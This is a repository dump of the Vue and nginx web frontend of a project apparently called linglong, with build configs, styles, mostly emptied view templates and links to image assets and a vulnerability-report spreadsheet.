-------------------------------------------------------------------------------- /web/nginx.conf: -------------------------------------------------------------------------------- 1 | 2 | #user nobody; 3 | worker_processes 1; 4 | events { 5 | worker_connections 1024; 6 | } 7 | 8 | 9 | http { 10 | include mime.types; 11 | default_type application/octet-stream; 12 | sendfile on; 13 | #tcp_nopush on; 14 | 15 | #keepalive_timeout 0; 16 | keepalive_timeout 65; 17 | 18 | #gzip on; 19 | gzip on; 20 | gzip_min_length 5k; 21 | gzip_buffers 4 16k; 22 | #gzip_http_version 1.0; 23 | gzip_comp_level 3; 24 | gzip_types text/plain application/javascript application/x-javascript text/css application/xml text/javascript application/x-httpd-php image/jpeg image/gif image/png; 25 | gzip_vary on; 26 | 27 | server { 28 | listen 8001; 29 | server_name localhost; 30 | 31 | location / { 32 | index index.html index.htm; #添加属性。 33 | root /usr/share/nginx/html; #站点目录 34 | } 35 | 36 | location /api/ { 37 | proxy_set_header Host $http_host; 38 | proxy_set_header X-Real-IP $remote_addr; 39 | proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; 40 | proxy_set_header X-Forwarded-Proto $scheme; 41 | proxy_pass http://127.0.0.1:18000/api/; 42 | } 43 | 44 | error_page 500 502 503 504 /50x.html; 45 | location = /50x.html { 46 | root /usr/share/nginx/html; 47 | } 48 | 49 | } 50 | 51 | } 52 | -------------------------------------------------------------------------------- /web/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "web", 3 | "version": "0.1.0", 4 | "private": true, 5 | "scripts": { 6 | "serve": "vue-cli-service serve", 7 | "build": "vue-cli-service build", 8 | "lint": "vue-cli-service lint" 9 | }, 10 | "dependencies": { 11 | "@tweenjs/tween.js": "^18.6.0", 12 | "axios": "^0.19.2", 13 | "core-js": "^3.6.5", 14 | "echarts": "^4.8.0", 15 | "element-ui": "^2.4.5", 16 | "less": "^3.11.3", 17 | "less-loader": "^6.1.1", 18 | "moment": "^2.27.0", 19 | "node-sass": "^4.14.1", 20 | "qs": "^6.9.4", 21 | "vue": "^2.6.11", 22 | "vue-count-to": "^1.0.13", 23 | "vue-router": "^3.2.0" 24 | }, 25 | "devDependencies": { 26 | "@vue/cli-plugin-babel": "~4.4.0", 27 | "@vue/cli-plugin-router": "~4.4.0", 28 | "@vue/cli-service": "~4.4.0", 29 | "babel-plugin-component": "^1.1.1", 30 | "sass-loader": "^10.0.1", 31 | "vue-cli-plugin-element": "^1.0.1", 32 | "vue-template-compiler": "^2.6.11" 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /web/public/12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/public/12.png -------------------------------------------------------------------------------- /web/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/public/favicon.ico -------------------------------------------------------------------------------- /web/public/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | <%= htmlWebpackPlugin.options.title %> 9 | 10 | 11 | 14 |
15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /web/server-config.js: -------------------------------------------------------------------------------- 1 | const isProd = process.env.NODE_ENV === 'production' 2 | // const localhost = 'http://127.0.0.1:9090/' 3 | const baseUrl = process.env.VUE_APP_API_URL 4 | const api = baseUrl 5 | export default { 6 | isProd, 7 | api 8 | } 9 | -------------------------------------------------------------------------------- /web/src/App.vue: -------------------------------------------------------------------------------- 1 | 8 | 14 | 15 | 17 | -------------------------------------------------------------------------------- /web/src/assets/all.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/src/assets/all.png -------------------------------------------------------------------------------- /web/src/assets/css/global.css: -------------------------------------------------------------------------------- 1 | /* 全局样式表 */ 2 | html, 3 | body, 4 | #app { 5 | height: 100%; 6 | margin:0; 7 | padding:0; 8 | } 9 | 10 | .el-breadcrumb{ 11 | margin-bottom: 15px; 12 | font-size: 13px; 13 | } 14 | 15 | .el-card{ 16 | box-shadow: 0 1px 1px rgba(0, 0, 0, 0.15) !important; 17 | } 18 | .el-table{ 19 | margin-top: 15px; 20 | font-size: 12px; 21 | } 22 | .el-pagination{ 23 | margin-top: 15px; 24 | } 25 | /* .el-cascader-menu { 26 | height: 300px; 27 | } */ 28 | .el-steps{ 29 | margin: 15px 0px; 30 | } 31 | 32 | .el-step__title { 33 | font-size: 12px; 34 | } 35 | .quill-editor{ 36 | height: 260px; 37 | } -------------------------------------------------------------------------------- /web/src/assets/fonts/iconfont.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/src/assets/fonts/iconfont.eot -------------------------------------------------------------------------------- /web/src/assets/fonts/iconfont.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/src/assets/fonts/iconfont.ttf -------------------------------------------------------------------------------- /web/src/assets/fonts/iconfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/src/assets/fonts/iconfont.woff -------------------------------------------------------------------------------- /web/src/assets/img/bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/src/assets/img/bg.png -------------------------------------------------------------------------------- /web/src/assets/img/btn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/src/assets/img/btn.png -------------------------------------------------------------------------------- /web/src/assets/ipall.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/src/assets/ipall.png -------------------------------------------------------------------------------- /web/src/assets/login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/src/assets/login.png -------------------------------------------------------------------------------- /web/src/assets/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/src/assets/logo.png -------------------------------------------------------------------------------- /web/src/assets/vuln.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/src/assets/vuln.png -------------------------------------------------------------------------------- /web/src/views/About.vue: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /web/src/views/Home.vue: -------------------------------------------------------------------------------- 1 | 7 | 8 | 19 | -------------------------------------------------------------------------------- /web/vue.config.js: -------------------------------------------------------------------------------- 1 | module.exports = { 2 | 3 | devServer: { 4 | 5 | disableHostCheck: true 6 | 7 | }, 8 | 9 | } 10 | -------------------------------------------------------------------------------- /漏洞报告.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/漏洞报告.xlsx --------------------------------------------------------------------------------